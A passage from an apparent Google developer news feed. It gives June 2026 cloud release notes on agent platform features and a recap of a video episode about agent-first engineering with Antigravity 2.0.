&lt;li&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/agent-designer-eap/workflow-agents"&gt;Workflow agents&lt;/a&gt;
(You need to be on the allowlist to access the page.)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Agent Gateway in General Availability&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Agent Gateway is the networking component of the Gemini
Enterprise Agent Platform ecosystem. It secures and governs connectivity for
all agentic interactions, whether they occur between users and agents,
agents and tools, or among agents themselves.&lt;/p&gt;
&lt;p&gt;For details, see &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/govern/gateways/agent-gateway-overview"&gt;Agent Gateway
overview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Agent Observability is generally available (GA)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This release provides visibility into the performance, behavior, and health of deployed agents and Model Context Protocol (MCP) servers directly within the agent management workflow.&lt;/p&gt;
&lt;p&gt;Key updates in this release include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Default-On Tracing:&lt;/strong&gt; OpenTelemetry tracing is now enabled by default for newly deployed Agent Development Kit (ADK) agents on Agent Engine, simplifying the observability setup process without requiring manual configuration.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Storage Prioritization:&lt;/strong&gt; Google Cloud Storage (GCS) is the default storage choice in the Google Cloud Console, instead of Cloud Logging. We recommend that you store your multimodal prompt and response payloads in a Cloud Storage (GCS) bucket. This solution provides robust support for large payloads and it enables fine-grained lifecycle management.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Tracing:&lt;/strong&gt; Inspect step-by-step session execution and view directed acyclic graphs (DAGs) of trace spans.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/optimize/observability/overview"&gt;Observability overview&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/optimize/observability/traces"&gt;View agent traces&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/scale/runtime/tracing"&gt;Set up tracing&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Agent Registry is generally available (GA)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Agent Registry is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available (GA)&lt;/a&gt;. Agent Registry is a centralized catalog for discovering and registering agents and Model Context Protocol (MCP) servers.&lt;/p&gt;
&lt;p&gt;The following features are available in Agent Registry for the GA launch stage:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;API v1 and client libraries:&lt;/strong&gt; The &lt;code&gt;v1&lt;/code&gt; version of the Agent Registry API is available. Cloud client libraries are available in C#, Go, Java, Node.js, PHP, Python, and Ruby.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A2A v1 support:&lt;/strong&gt; Agent Registry supports Agent-to-Agent (A2A) protocol version &lt;code&gt;1.0&lt;/code&gt;, letting you explicitly declare transport endpoints and bindings inside the &lt;code&gt;supportedInterfaces&lt;/code&gt; array, in addition to the existing &lt;code&gt;0.3&lt;/code&gt; schema support.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Terraform support:&lt;/strong&gt; Terraform scripts for Application Default Credentials (ADC) have graduated to General Availability. You can use Terraform to configure and manage your agents, MCP servers, endpoints, and bindings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Known limitations:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Access Transparency and Access Approval:&lt;/strong&gt; &lt;a href="https://docs.cloud.google.com/assured-workloads/access-transparency/docs/overview"&gt;Access Transparency&lt;/a&gt; logs, which provide visibility into when Google personnel access your content, and &lt;a href="https://docs.cloud.google.com/assured-workloads/access-approval/docs/overview"&gt;Access Approval&lt;/a&gt; controls aren't available for Agent Registry configurations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Residency:&lt;/strong&gt; If you configure the &lt;a href="https://docs.cloud.google.com/organization-policy/restrict-locations"&gt;resource location constraint&lt;/a&gt; in your organization policy, Agent Registry enforces the constraint when you register a resource. However, detective controls for data residency compliance reporting are limited.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see the &lt;a href="https://docs.cloud.google.com/agent-registry/overview"&gt;Agent Registry overview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The Agent Identity API (&lt;code&gt;agentidentity.googleapis.com&lt;/code&gt;) is
available in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.
This new API replaces the legacy IAM Connectors API
(&lt;code&gt;iamconnectors.googleapis.com&lt;/code&gt;) for managing auth providers and agent
identities.&lt;/p&gt;
&lt;p&gt;During the preview migration period, both APIs operate side-by-side. Existing
auth providers are automatically mirrored to the new V2 resource hierarchy
(&lt;code&gt;authProviders/&lt;/code&gt;), allowing you to migrate your IAM policies, agent code, and
client applications without downtime.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Identity and Access Management&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The Agent Identity API (&lt;code&gt;agentidentity.googleapis.com&lt;/code&gt;) is
available in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.
This new API replaces the legacy IAM Connectors API
(&lt;code&gt;iamconnectors.googleapis.com&lt;/code&gt;) for managing auth providers and agent
identities.&lt;/p&gt;
&lt;p&gt;During the preview migration period, both APIs operate side-by-side. Existing
auth providers are automatically mirrored to the new V2 resource hierarchy
(&lt;code&gt;authProviders/&lt;/code&gt;), allowing you to migrate your IAM policies,
agent code, and client applications without downtime.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Oracle Database@Google Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;For Exadata Database Service on Exascale infrastructure and Base Database Service, Oracle Database@Google Cloud adds region &lt;code&gt;asia-northeast2&lt;/code&gt; (Osaka, Japan).&lt;/p&gt;
&lt;p&gt;For a list of supported locations, see &lt;a href="https://docs.cloud.google.com/oracle/database/docs/regions-and-zones"&gt;Supported regions and zones&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Security Command Center&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Security Command Center External Exposure is available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt; for the
Security Command Center Premium tier. The service helps you manage and reduce your external
attack surface through automated asset discovery, Google Cloud network exposure
path validation, and active exploitability testing.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/security-command-center/docs/detect-external-exposure"&gt;Detect exposed
resources&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_18_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developer.chrome.com/blog/devtools-for-agents-3p-tools?hl=en</id>
    <title>Unlock runtime insights: Introducing third-party developer tools for Chrome DevTools for agents</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">Chrome DevTools for agents introduces third-party developer tools, which lets frameworks and applications share rich, runtime context with AI coding assistants.</content>
    <link href="https://developer.chrome.com/blog/devtools-for-agents-3p-tools?hl=en" rel="alternate"/>
    <category term="Chrome for Developers"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-100x-engineering-with-ai-agents-in-google-antigravity-20/</id>
    <title>Agent Factory Recap:  100X engineering with AI agents in Google Antigravity 2.0</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;In this episode of the Agent Factory, I sat down with Rody Davis, one of Google’s top agentic engineers. We dive into the massive shift from traditional IDEs to agent-first platforms, the reality of code reviews in an AI-driven world, and how to use "skills" to perform at a 100X level.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=Dk4MD6TNiWE"&gt;

      
        &lt;img alt="Episode 6 of the Agent Factory." src="//img.youtube.com/vi/Dk4MD6TNiWE/maxresdefault.jpg" /&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=Dk4MD6TNiWE"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;This post guides you through the key ideas from our conversation. Use it to quickly recap topics or dive deeper into specific segments with links and timestamps.&lt;/p&gt;
&lt;h2&gt;Google Antigravity 2.0 - What is it?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://antigravity.google/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; has evolved from a simple agentic IDE into a full-scale agent-first platform. It now consists of four core pillars: a standalone desktop &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Manager&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for orchestration, a robust &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;CLI&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for server-side work, an &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;SDK&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for custom Python-based workflows, and a specialized &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;IDE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This unbundled approach allows developers to compose their own environment, managing multiple folders and complex project structures without being forced into a single-workspace layout.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Rody Davis on 100X Engineering&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We explored the strategies elite engineers use to scale their impact and reduce the "cognitive toil" of daily development.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling Impact and Reducing Toil&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=115s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;01:55&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody explains that AI isn't just about writing code; it's about accelerating the entire lifecycle. He uses agents to write richer test suites and prototype multiple versions of an app before committing to a framework. By offloading "toil", like building marketing sites, he can focus on high-level architecture and problem-solving.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Skills as "Context Cheat Sheets"&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=185s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;03:05&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;A core philosophy in Rody’s workflow is the use of "Skills." He views skills as a way to compress context for the model. "It’s literally a cheat sheet for the agent," Rody notes. By providing the agent with specific design systems or API documentation, the model becomes significantly faster and more accurate, avoiding the latency of searching through massive, unorganized docs.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Customizations, Skills, and MCP Servers&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;list=PLIivdWyY5sqLXR1eSkiM5bE6pFlXC-OSs&amp;amp;index=1&amp;amp;t=257s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;04:17&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="skills_better2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/skills_better2.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Rody walks us through the customizations tab in Antigravity 2.0, showing how to extend an agent's capabilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Android CLI:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Building and deploying mobile apps directly from the command line.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Modern Web Guidance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Grounding the agent in the latest CSS and accessibility standards.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;MCP Servers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Using the Model Context Protocol to enable features like hot reloading for Flutter and Dart.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The Bonsai Approach to Code Review&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=327s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;05:27&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody compares maintaining a codebase to being a Bonsai artist: constantly pruning to keep things simple. He advocates for flat architectures where state, UI, and data are strictly separated. This makes it easier for a human to "steer" the agent; if the agent starts putting files in the wrong place, the architectural violation is immediately obvious.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="bonsai" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/bonsai.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Do you review 100% of agent-generated code?&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=431s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;07:11&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rody’s answer depends on the task. For a marketing site, he focuses on the visual output rather than the code. However, for backend logic, he cares deeply about API contracts and schemas. He recommends writing the first example yourself so the agent can simply "copy the pattern" for the rest of the codebase.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Building Extensions to Solve Daily Friction&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=545s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;09:05&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;To solve the problem of managing files across multiple Git projects, Rody used Antigravity to build a custom macOS Finder extension in Swift. This tool allows him to filter files by time boxes (today, last week, etc.), demonstrating how agents can build specialized utilities that reduce daily friction.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="extensionscroped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/extensionscroped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Do AI engineers still write code by hand?&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=622s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;10:22&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"Oh yeah," Rody says. He still loves the syntax of languages like Go and the challenge of controlling computers. He believes it's vital to understand the building blocks deeply so that when you face a problem two years down the road, you know exactly which "old project" to reach back for.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Powering Personal Websites with Gemma 4&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=702s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;11:42&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody showcases his personal website, which uses &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-how-gemma-4-taught-itself-physics?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemma 4&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and Embedding Gemma to provide dynamic content recommendations offline. By vectorizing post summaries at compile time, the site can suggest related content via a local vector database without needing a live backend server.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="gemma4websitecroped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gemma4websitecroped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;The Factory Floor&lt;/h2&gt;
&lt;p&gt;The Factory Floor is our segment for getting hands-on. Here, we moved from high-level concepts to practical code with live demos.&lt;/p&gt;
&lt;h3&gt;Multi-Agent Parallelism in Action&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=842s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;14:02&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;n this demo, Rody uses a single stream-of-thought voice prompt to build a full-stack application. We watched as Antigravity:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Spun up parallel sub-agents, including a dedicated DevOps and QA engineer. (see &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1188s" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;19:48&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Built a multilingual note-taking app using Vite, Go, and SQLite.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Orchestrated the entire stack via Docker Compose.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Localized the app into five different languages simultaneously.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="subagentscropped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/subagentscropped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Unbundling the IDE Ecosystem&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image2_FHRmWV2.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=935s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;15:35&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We discussed why Google separated the IDE from the Agent Manager. Rody highlights that this unlocks different workflows: the CLI is perfect for SSH sessions on a Raspberry Pi, while the Agent Manager handles general knowledge work and orchestration across multiple folders.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Turning Documentation into Reusable Skills&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1541s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;25:41&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody shares his process for turning documentation into skills. He wrote a Go CLI that parses websites into markdown, allowing him to install hundreds of skills for the sites he visits frequently. This ensures the agent always has access to the specific version of the docs he is using.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rapid Fire: Future Tech Predictions&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="hotjob" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/hotjob.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1655s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;27:35&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We put Rody on the spot with some controversial takes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Vibe Coding:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rody believes a non-technical founder will launch a company using only vibe coding by 2026, but the real test will be maintaining it in years 2 through 5.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
